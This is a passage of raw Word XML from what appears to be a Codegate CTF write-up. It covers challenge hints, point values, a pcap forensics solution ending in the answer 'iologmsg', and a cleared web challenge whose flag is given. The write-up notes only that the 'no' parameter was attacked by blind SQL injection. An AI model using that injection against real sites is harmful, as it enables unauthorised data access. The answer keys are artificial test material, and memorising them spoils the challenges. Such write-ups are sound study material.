          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>•352FCD8BDEC8244CDED00CA866CA24B9 (pcap)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C410E1" w:rsidRDefault="00C410E1" w:rsidP="00C410E1">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C410E1">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>•B400CBEA39EA52126E2478E9A951CDE8 (MSDOS5.0 image)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C410E1" w:rsidRDefault="00C410E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C410E1" w:rsidRDefault="00C410E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C410E1" w:rsidRPr="008C79FD" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2088" type="#_x0000_t202" style="width:437.4pt;height:42.85pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2088" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="004C534A" w:rsidRDefault="008A4C86" w:rsidP="008C79FD">
                  <w:r w:rsidRPr="004C534A">
                    <w:t>Hint: The packet of messenger is important. You don't need to care the ftp stuff.</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="004C534A" w:rsidRDefault="008A4C86" w:rsidP="008C79FD"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="004C534A" w:rsidRDefault="008A4C86" w:rsidP="008C79FD">
                  <w:r w:rsidRPr="004C534A">
                    <w:t>Hint2: Please put your flag without any extension to the auth page.</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C410E1" w:rsidRDefault="00C410E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A93468" w:rsidRDefault="00A93468">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A93468" w:rsidRDefault="00A93468">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">xport files that is send in messengers.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A93468">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>testout.bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A93468" w:rsidRDefault="00A93468">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> Check file, we found PDF files.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A93468">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>testout.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A93468" w:rsidRDefault="00A93468">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C79FD" w:rsidRDefault="00A93468">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">We used </w:t>
      </w:r>
      <w:r>
        <w:t>xdoc2txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> wh</w:t>
      </w:r>
      <w:r w:rsidR="00591E9D">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ich is grab text data from binary files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRDefault="00591E9D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00591E9D">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>http://www31.ocn.ne.jp/~h_ishida/xdoc2txt.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRPr="00A93468" w:rsidRDefault="00591E9D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRDefault="00591E9D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>we got text "</w:t>
      </w:r>
      <w:r w:rsidRPr="00591E9D">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>CC105EE2A139A631175571452968D637</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRPr="00591E9D" w:rsidRDefault="00591E9D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>searched md5 data  in image files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRPr="00591E9D" w:rsidRDefault="00591E9D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>e found that file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRDefault="00591E9D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRDefault="00591E9D" w:rsidP="00591E9D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00591E9D">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>cc105ee2a139a631175571452968d637 *iologmsg.dat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRDefault="00591E9D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRDefault="00591E9D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRDefault="00591E9D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Answer is "</w:t>
      </w:r>
      <w:r w:rsidRPr="00591E9D">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>iologmsg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRDefault="00591E9D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1079" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00591E9D" w:rsidRDefault="008A4C86" w:rsidP="00762DA2">
      <w:pPr>
        <w:ind w:left="1" w:firstLineChars="2" w:firstLine="5"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc257340757"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge7</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:400   </w:t>
      </w:r>
      <w:r>
        <w:t>Not cleared</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A3968" w:rsidRDefault="008A4C86" w:rsidP="00591E9D">
      <w:pPr>
        <w:ind w:leftChars="3" w:left="6"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2086" type="#_x0000_t202" style="width:437.4pt;height:46.95pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2086" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="00EB4B4B">
                  <w:r>
                    <w:t>credentials: http://ctf1.codegate.org/ssl.pcap</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="00EB4B4B"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="00EB4B4B">
                  <w:r>
                    <w:t>* hint: does the modulus look familiar?</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRDefault="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRDefault="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1080" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc257340758"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:600   </w:t>
      </w:r>
      <w:r>
        <w:t>Not cleared</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2084" type="#_x0000_t202" style="width:437.4pt;height:56.35pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2084" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="00EB4B4B">
                  <w:r>
                    <w:t>credentials: http://ctf1.codegate.org/99b5f49189e5a688492f13b418474e7e/web4.php</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="00EB4B4B"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="00EB4B4B">
                  <w:r>
                    <w:t>HINT: "the first part is just an IV"</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1081" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:spacing w:after="280" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc257340759"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge9</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:1000  </w:t>
      </w:r>
      <w:r>
        <w:t>Cleared</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Answer:b05e4f79ccbc4a71ce9fb28c64896a80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2082" type="#_x0000_t202" style="width:437.4pt;height:16.45pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2082" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="009953C5">
                  <w:r w:rsidRPr="00EB4B4B">
                    <w:t>http://ctf8.codegate.org/597d0c8bbd21d9924cde3567258f4e62/index.php</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="0025221C" w:rsidRPr="0025221C" w:rsidRDefault="0025221C" w:rsidP="0025221C">
      <w:pPr>
        <w:spacing w:after="280" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0025221C">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>login attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0025221C" w:rsidRDefault="00AA5FD6" w:rsidP="0025221C">
      <w:pPr>
        <w:spacing w:after="280" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2081" type="#_x0000_t202" style="width:399.85pt;height:64.65pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2081" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="0025221C" w:rsidRPr="0025221C" w:rsidRDefault="0025221C" w:rsidP="0025221C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0025221C">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>/597d0c8bbd21d9924cde3567258f4e62/index.php?no=1&amp;id=guest&amp;pw=guest</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="0025221C" w:rsidRPr="0025221C" w:rsidRDefault="0025221C" w:rsidP="0025221C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0025221C">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>Success - guest</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="0025221C" w:rsidRPr="0025221C" w:rsidRDefault="0025221C" w:rsidP="0025221C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="0025221C" w:rsidRPr="0025221C" w:rsidRDefault="0025221C" w:rsidP="0025221C">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0025221C">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t xml:space="preserve">/597d0c8bbd21d9924cde3567258f4e62/index.php?no=1&amp;id=admin&amp;pw=admin </w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="0025221C" w:rsidRPr="0025221C" w:rsidRDefault="0025221C" w:rsidP="0025221C">
                  <w:r w:rsidRPr="0025221C">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>Failure</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="0025221C" w:rsidRPr="0025221C" w:rsidRDefault="0025221C">
      <w:pPr>
        <w:spacing w:after="280" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Blind SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="00680149">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> to no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="000131C6" w:rsidP="0025221C">
      <w:pPr>
        <w:pStyle w:val="Img"/>
        <w:spacing w:after="280" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="ko-KR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2320290" cy="2320290"/>
            <wp:effectExtent l="19050" t="0" r="3810" b="0"/>
            <wp:docPr id="69" name="図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 cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2320290" cy="2320290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRPr="009934CF" w:rsidRDefault="009934CF" w:rsidP="009934CF">
      <w:pPr>
        <w:pStyle w:val="Img"/>
        <w:spacing w:after="280" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
